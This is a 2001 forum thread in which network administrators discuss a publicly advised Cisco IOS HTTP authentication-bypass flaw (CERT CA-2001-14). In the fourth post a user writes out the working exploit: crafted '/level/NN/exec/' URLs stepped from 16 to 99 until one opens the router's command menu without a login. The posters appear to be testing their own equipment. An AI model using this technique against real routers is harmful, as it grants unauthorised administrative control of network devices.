Jun 28, 2001 #1 Guest_imported New member Joined Jan 1, 1970 Messages 0 Has anyone managed to get this to work ? http://www.cert.org/advisories/CA-2001-14.html I've been banging away at our test 2610 today but can't get in..
Has anyone managed to get this to work ? http://www.cert.org/advisories/CA-2001-14.html I've been banging away at our test 2610 today but can't get in..
Jun 28, 2001 #2 soupnazi IS-IT--Management Joined Apr 2, 2001 Messages 22 Location US yep, it works for me... take out the last space after the .html and it should work fine. Try the following link: http://www.cert.org/advisories/CA-2001-14.html Good luck! -soupnazi- "No soup for you!" Upvote 0 Downvote
yep, it works for me... take out the last space after the .html and it should work fine. Try the following link: http://www.cert.org/advisories/CA-2001-14.html Good luck! -soupnazi- "No soup for you!"
Jun 28, 2001 #3 Challenger Technical User Joined Jun 28, 2001 Messages 15 Location AU Hi again, i've registered now, I meant being able to get into the cisco router via the vulnerability, not the site listed ! Sorry about that !! Upvote 0 Downvote
Hi again, i've registered now, I meant being able to get into the cisco router via the vulnerability, not the site listed ! Sorry about that !!
Jul 1, 2001 #4 mildmanrd Technical User Joined May 5, 2001 Messages 18 Location US Hi, I've just read the vulnerability and tried it on my 2501 running IOS 11.3(11a) with success. Just follow the steps as described and it will work. open up a browser and type: http://address/level/xx/exec/ ex. http://10.2.1.1/level/16/exec/http://10.2.1.1/level/17/exec/http://10.2.1.1/level/18/exec/http://10.2.1.1/level/19/exec/ . . http://10.2.1.1/level/99/exec/ Just keep plugging in values between 16 and 99 until viola! Mine broke at 19. It totally bypasses authentication and goes right to the command menu. Upvote 0 Downvote
Hi, I've just read the vulnerability and tried it on my 2501 running IOS 11.3(11a) with success. Just follow the steps as described and it will work. open up a browser and type: http://address/level/xx/exec/ ex. http://10.2.1.1/level/16/exec/http://10.2.1.1/level/17/exec/http://10.2.1.1/level/18/exec/http://10.2.1.1/level/19/exec/ . . http://10.2.1.1/level/99/exec/ Just keep plugging in values between 16 and 99 until viola! Mine broke at 19. It totally bypasses authentication and goes right to the command menu.